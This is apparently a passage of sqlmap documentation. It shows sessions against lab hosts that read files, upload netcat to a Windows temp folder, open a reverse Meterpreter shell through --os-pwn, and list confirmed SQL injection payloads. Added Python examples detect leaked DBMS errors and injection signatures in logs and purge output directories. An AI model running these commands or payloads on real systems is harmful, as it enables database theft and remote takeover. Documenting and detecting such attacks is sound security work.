$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner

[...]
[hh:mm:39] [INFO] testing MySQL
[hh:mm:39] [INFO] confirming MySQL
[hh:mm:40] [INFO] the back-end DBMS is MySQL
[hh:mm:40] [INFO] fetching banner
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS operating system: Windows
back-end DBMS: MySQL < 5.0.0
banner: '4.1.21-community-nt'
[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/txt/common-tables.txt'
[hh:mm:40] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 8
[hh:mm:43] [INFO] retrieved: users

Database: testdb
[1 table]
+-------+
| users |
+-------+

Brute-force column names

Parameter: --common-columns

As with brute-forcing table names, the column names tried are read from txt/common-columns.txt.

User-defined function injection

Parameters: --udf-inject, --shared-lib

You can inject your own user-defined functions (UDFs) by compiling a MySQL or PostgreSQL shared library: a DLL on Windows, or a shared object on Linux/Unix. sqlmap asks you some questions, uploads the shared library to the database server, creates the user-defined functions from it and executes them as you choose. When you are done, sqlmap removes them again.

File system access

Read a file from the database server

Parameter: --file-read

Works when the back-end DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current session user has the privileges needed to use the DBMS functions involved. The file read can be text or binary. An example against Microsoft SQL Server 2005:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \
--file-read "C:/example.exe" -v 1

[...]
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005

[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
C:/example.exe file saved to: '/software/sqlmap/output/192.168.136.129/files/C__example.exe'
[...]

$ ls -l output/192.168.136.129/files/C__example.exe
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe

$ file output/192.168.136.129/files/C__example.exe
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Upload a file to the database server

Parameters: --file-write, --file-dest

Works when the back-end DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current session user has the privileges needed to use the DBMS functions involved. The uploaded file can be text or binary.

An example against MySQL:

$ file /software/nc.exe.packed
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit

$ ls -l /software/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \
"/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1

[...]
[hh:mm:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL >= 5.0.0
[...]
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully written on the back-end DBMS file system? [Y/n] y
[hh:mm:52] [INFO] retrieved: 31744
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes,
same size as the local file '/software/nc.exe.packed'

When the back-end DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current session user has the privileges needed to use the DBMS functions involved, a TCP connection can be established directly between the database server and the attacker's machine. This connection can be an interactive command prompt or a Meterpreter session. sqlmap relies on Metasploit to generate the shellcode and has four ways of executing it:

1. In memory, through the user-defined sys_bineval() function; supported on MySQL and PostgreSQL. Parameter: --os-pwn.
2. By uploading a stand-alone payload and executing it through a user-defined function: sys_exec() on MySQL and PostgreSQL, xp_cmdshell() on Microsoft SQL Server. Parameter: --os-pwn.
3. By executing the Metasploit shellcode through an SMB relay attack (MS08-068), when the privileges sqlmap obtained are high enough (uid=0 on Linux/Unix, Administrator on Windows). Parameter: --os-smbrelay.
4. By executing the Metasploit payload in memory through the sp_replwritetovarbin stored procedure overflow (MS09-004) in Microsoft SQL Server 2000 and 2005. Parameter: --os-bof.

An example against MySQL:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit

[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [192.168.136.1]
which local port number do you want to use? [60641]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..

                                 _
                                | |      o
 _  _  _    _ _|_  __,   ,    _ | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|
                           \|

       =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12272 updated 4 days ago (2011.04.07)

Ignore the queries stored in the session file and run them again.

Use DBMS hex functions

Parameter: --hex

Character-encoding problems can sometimes cause data loss during retrieval; the DBMS hex functions can be used to avoid that:

An example against PostgreSQL:

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors

[...]
[xx:xx:14] [INFO] fetching banner
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ERROR: invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>'
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by
GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
[...]

Custom output directory path

Parameter: --output-dir

By default sqlmap stores its session and result files under the output directory; use this parameter to set a custom output path, for example: --output-dir=/tmp

Parse DBMS error messages from responses

Parameter: --parse-errors

Sometimes the target has not disabled DBMS error reporting, so when a database statement fails the error text is returned in the response; with this parameter sqlmap parses and displays those error messages.

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors
[...]
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] target URL appears to have 3 columns in query
[...]
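Both the --hex session and the --parse-errors session above depend on the same application weakness: the DBMS error text is echoed back to the client, and in the PostgreSQL case it carries the retrieved value as marker-wrapped hex (":vtj:<hex>:nxb:"). The Python script below is an added example written from the defender's side; it is not code from sqlmap or from the original page. It checks a captured HTTP response body for verbose DBMS error signatures (built here from the messages quoted on this page) and, where a marker-wrapped hex value is present, decodes it so an incident responder can record exactly what was disclosed. The sample responses are constructed, and the assumption that the markers are three lower-case letters is taken from the page's one example.

```python
import re

# Marker-wrapped hex value as it appears inside the DBMS error text in the
# --hex session above (":vtj:<hex>:nxb:"). Assumption for this example: the
# markers are three lower-case letters, as in that output.
HEX_MARKER_RE = re.compile(r":([a-z]{3}):([0-9A-Fa-f]+):([a-z]{3}):")

# Signatures of verbose DBMS error text. Constructed for this example from
# the messages quoted on this page; extend for other drivers as needed.
DB_ERROR_SIGNATURES = [
    re.compile(r"pg_query\(\).*Query failed", re.I | re.S),
    re.compile(r"Microsoft OLE DB Provider for ODBC Drivers", re.I),
    re.compile(r"\[Microsoft\]\[ODBC SQL Server Driver\]\[SQL Server\]", re.I),
    re.compile(r"invalid input syntax for type numeric", re.I),
    re.compile(r"is out of range of the number of items in the select list", re.I),
]


def leaks_db_error(response_body):
    """True when the response body carries a recognisable DBMS error message,
    i.e. the application exposes the error text that --parse-errors feeds on."""
    return any(sig.search(response_body) for sig in DB_ERROR_SIGNATURES)


def extract_hex_leaks(response_body):
    """Find marker-wrapped hex values in a response body and decode them.

    Returns a list of (decoded_text, raw_hex) pairs. decoded_text is None when
    the hex cannot be decoded (odd length or invalid UTF-8), which happens when
    the error text was truncated before it reached the client."""
    findings = []
    for _start, hexdata, _stop in HEX_MARKER_RE.findall(response_body):
        try:
            findings.append((bytes.fromhex(hexdata).decode("utf-8"), hexdata))
        except ValueError:  # UnicodeDecodeError is a subclass of ValueError
            findings.append((None, hexdata))
    return findings


def triage_response(response_body):
    """Summarise one captured response for an incident-response note."""
    leaks = extract_hex_leaks(response_body)
    return {
        "verbose_db_error": leaks_db_error(response_body),
        "disclosed_values": [text for text, _ in leaks if text is not None],
        "undecodable_fragments": sum(1 for text, _ in leaks if text is None),
    }


# Constructed sample responses; none was captured from a real target.
SAMPLE_BANNER = ("PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by "
                 "GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2")
SAMPLE_LEAKING_RESPONSE = (
    "<b>Warning</b>: pg_query() [<a href='function.pg-query'>function.pg-query</a>]: "
    "Query failed: ERROR: invalid input syntax for type numeric: "
    '":vtj:' + SAMPLE_BANNER.encode("utf-8").hex() + ':nxb:" '
    "in <b>/var/www/app/db.inc.php</b> on line <b>35</b>"
)
SAMPLE_TRUNCATED_RESPONSE = (
    'Query failed: ERROR: invalid input syntax for type numeric: ":vtj:506f737467726553514:nxb:"'
)
SAMPLE_CLEAN_RESPONSE = "<html><body>Something went wrong. Reference #4f2a</body></html>"

if __name__ == "__main__":
    for name, body in [("leaking", SAMPLE_LEAKING_RESPONSE),
                       ("truncated", SAMPLE_TRUNCATED_RESPONSE),
                       ("clean", SAMPLE_CLEAN_RESPONSE)]:
        print(name, triage_response(body))
```

Run it over the response bodies in a proxy or WAF capture: a response that trips leaks_db_error() is the finding to fix on the application side (return a generic error page and log the DBMS error server-side), while any decoded value is the data you have to treat as disclosed. The truncated sample shows why odd-length hex is reported rather than raised: a partial fragment still proves that the channel was used.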
python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"

can be written as:

python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"

Alert on successful SQL injection

Parameter: --alert

Predefine answers to prompts

Parameter: --answers

Use this parameter to supply the answers you want automatically wherever sqlmap would otherwise prompt for input. Example:

$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1" --technique=E --answers="extending=N" --batch
[...]
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N
[...]

Sometimes the server only accepts requests from mobile clients; in that case a smartphone User-Agent can be set to imitate a mobile device.

For example:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]

Securely delete the files in the output directory

Parameter: --purge-output

Use this parameter when result files must be deleted without being recoverable: the existing files are overwritten with random data before they are removed.

For example:

$ python sqlmap.py --purge-output -v 3
[...]
[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...
[xx:xx:55] [DEBUG] changing file attributes
[xx:xx:55] [DEBUG] writing random data to files
[xx:xx:55] [DEBUG] truncating files
[xx:xx:55] [DEBUG] renaming filenames to random values
[xx:xx:55] [DEBUG] renaming directory names to random values
[xx:xx:55] [DEBUG] deleting the whole directory tree
[...]
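The DEBUG lines above spell out the six steps of the purge. The Python function below is an added example, not sqlmap's own implementation, that performs those same steps in the same order on an arbitrary directory tree: make each file writable, overwrite it with random bytes of its own length, truncate it, rename files and then directories to random names, and finally delete the tree. The demo() helper builds a throw-away tree shaped like an output directory (constructed sample data, including one read-only file) and purges it.

```python
import os
import secrets
import shutil
import stat
import tempfile


def purge_directory(root):
    """Wipe and delete the tree below `root` in the order sqlmap's DEBUG
    output above reports: make files writable, overwrite them with random
    data, truncate them, rename files and directories to random names, then
    delete the whole tree. Returns the number of regular files overwritten."""
    root = os.path.abspath(root)
    if not os.path.isdir(root):
        raise FileNotFoundError(root)
    wiped = 0
    # Bottom-up walk: a directory is renamed only after its contents are done.
    for dirpath, dirnames, filenames in os.walk(root, topdown=False):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                os.unlink(path)          # remove the link itself, never its target
                continue
            os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)   # 1. changing file attributes
            size = os.path.getsize(path)
            with open(path, "r+b") as fh:                 # 2. writing random data to files
                fh.write(os.urandom(size))
                fh.flush()
                os.fsync(fh.fileno())
            with open(path, "r+b") as fh:                 # 3. truncating files
                fh.truncate(0)
            os.rename(path, os.path.join(dirpath, secrets.token_hex(8)))  # 4. random file name
            wiped += 1
        for name in dirnames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                os.unlink(path)
                continue
            os.rename(path, os.path.join(dirpath, secrets.token_hex(8)))  # 5. random dir name
    shutil.rmtree(root)                                                   # 6. delete the tree
    return wiped


def demo():
    """Build a throw-away output tree (constructed sample data, not a real
    sqlmap run) and purge it; returns (files wiped, root still exists)."""
    root = tempfile.mkdtemp(prefix="purge-demo-")
    target = os.path.join(root, "192.0.2.10")
    os.makedirs(os.path.join(target, "files"))
    with open(os.path.join(target, "log"), "w") as fh:
        fh.write("Database: testdb\nTable: users\n")
    with open(os.path.join(target, "session"), "w") as fh:
        fh.write("[banner]\n")
    with open(os.path.join(target, "files", "C__example.exe"), "wb") as fh:
        fh.write(b"MZ" + b"\x00" * 2558)
    # A read-only result file, to exercise step 1.
    os.chmod(os.path.join(target, "session"), stat.S_IRUSR)
    wiped = purge_directory(root)
    return wiped, os.path.exists(root)


if __name__ == "__main__":
    print("files wiped, root still present:", demo())
```

Overwriting in place only defeats recovery where the filesystem rewrites the same blocks; on SSDs with wear levelling, on copy-on-write or journaling filesystems, and wherever snapshots or backups exist, the old contents can survive, so this kind of purge is a hygiene measure for a working directory, not a substitute for encrypting the output location.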

Heuristic injection testing

Parameter: --smart

When a very large number of target URLs must be tested, this parameter saves time by running the full set of injection tests only on parameters that the quick heuristic check flags as likely injectable (for example, ones that trigger a DBMS error).

Example:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'ca'
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'user'
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL inline queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[...]

Wizard interface for beginner users

Parameter: --wizard

Intended for beginner users: it walks you step by step through the inputs needed to test a target.

$ python sqlmap.py --wizard

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

starting at 11:25:26

Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1

sqlmap is running, please wait..

heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2986=2986

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+CHAR(70)+CHAR(79)+CHAR(118)+CHAR(106)+CHAR(87)+CHAR(101)+CHAR(119)+CHAR(115)+CHAR(114)+CHAR(77)+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58))
---
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS operating system: Windows XP Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
    Oct 14 2005 00:33:37
    Copyright (c) 1988-2005 Microsoft Corporation
    Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
---
current user: 'sa'
current database: 'testdb'
current user is DBA: True
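The injection-point summary above lists the payload shapes sqlmap confirmed (the boolean AND n=n pair, CONVERT(INT, ...) error-based probes, UNION ALL SELECT NULL,..., and stacked and time-based WAITFOR DELAY), and the --parse-errors session earlier shows the ORDER BY column-count probing that precedes a UNION test. Every one of those requests lands in the web server's access log. The Python script below is an added detection example written for the defending side; it is not code from sqlmap or from the original page. It parses access-log lines in Apache combined format, URL-decodes each query string, tags the technique signatures it finds, and flags a client that exercised several distinct techniques in one log, which is the footprint of an automated tool working through its test list rather than a single stray request. The log lines, addresses, signature list and threshold are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Signatures of the techniques confirmed in the session above, matched against
# the URL-decoded query string. Constructed for this example; tune to your app.
TECHNIQUE_PATTERNS = {
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)=\1\b", re.I),
    "error-based": re.compile(r"CONVERT\s*\(\s*INT\s*,|CAST\s*\(.+?\bAS\s+NUMERIC\s*\)", re.I),
    "UNION query": re.compile(r"\bUNION\s+ALL\s+SELECT\b", re.I),
    "stacked queries": re.compile(r";\s*WAITFOR\s+DELAY\b", re.I),
    "time-based blind": re.compile(r"\bWAITFOR\s+DELAY\b|\bSLEEP\s*\(", re.I),
    "column-count probing": re.compile(r"\bORDER\s+BY\s+\d+", re.I),
}


def parse_access_log_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_request(path):
    """Return the set of technique labels whose signature appears in the
    URL-decoded query string of a request path."""
    decoded = unquote_plus(path.partition("?")[2])
    return {name for name, pat in TECHNIQUE_PATTERNS.items() if pat.search(decoded)}


def summarize(lines):
    """Aggregate per client IP: request count, 5xx responses and techniques seen."""
    per_ip = defaultdict(lambda: {"requests": 0, "server_errors": 0, "techniques": set()})
    for line in lines:
        rec = parse_access_log_line(line)
        if rec is None:
            continue  # unparseable line: skip rather than abort the whole run
        entry = per_ip[rec["ip"]]
        entry["requests"] += 1
        if rec["status"].startswith("5"):
            entry["server_errors"] += 1
        entry["techniques"] |= classify_request(rec["path"])
    return dict(per_ip)


def suspected_scanners(summary, min_techniques=3):
    """IPs that exercised at least `min_techniques` distinct injection
    techniques. One hit may be a false positive; several in one log is the
    footprint of an automated tool stepping through its test list."""
    return sorted(ip for ip, e in summary.items() if len(e["techniques"]) >= min_techniques)


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Apr/2011:11:25:30 +0000] "GET /get_int.asp?id=1%20AND%202986%3D2986 HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/Apr/2011:11:25:31 +0000] "GET /get_int.asp?id=1%20AND%204847%3DCONVERT(INT%2C(CHAR(58)%2BCHAR(118))) HTTP/1.1" 500 734',
    '192.0.2.10 - - [10/Apr/2011:11:25:32 +0000] "GET /get_int.asp?id=1%20ORDER%20BY%2010--%20 HTTP/1.1" 500 702',
    '192.0.2.10 - - [10/Apr/2011:11:25:33 +0000] "GET /get_int.asp?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 HTTP/1.1" 200 640',
    '192.0.2.10 - - [10/Apr/2011:11:25:39 +0000] "GET /get_int.asp?id=1%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20 HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Apr/2011:11:26:01 +0000] "GET /get_int.asp?id=42 HTTP/1.1" 200 410',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    report = summarize(SAMPLE_LOG)
    for ip, entry in report.items():
        print(ip, entry["requests"], entry["server_errors"], sorted(entry["techniques"]))
    print("suspected scanners:", suspected_scanners(report))
```

Two design points matter in practice: decode before matching, because the payloads arrive percent-encoded and a pattern applied to the raw line misses them, and score per client rather than per request, because the sequence of distinct techniques (plus the burst of 5xx responses from the ORDER BY probing) is far more specific than any single signature. POST bodies are not in the access log, so this only covers the GET case shown on this page.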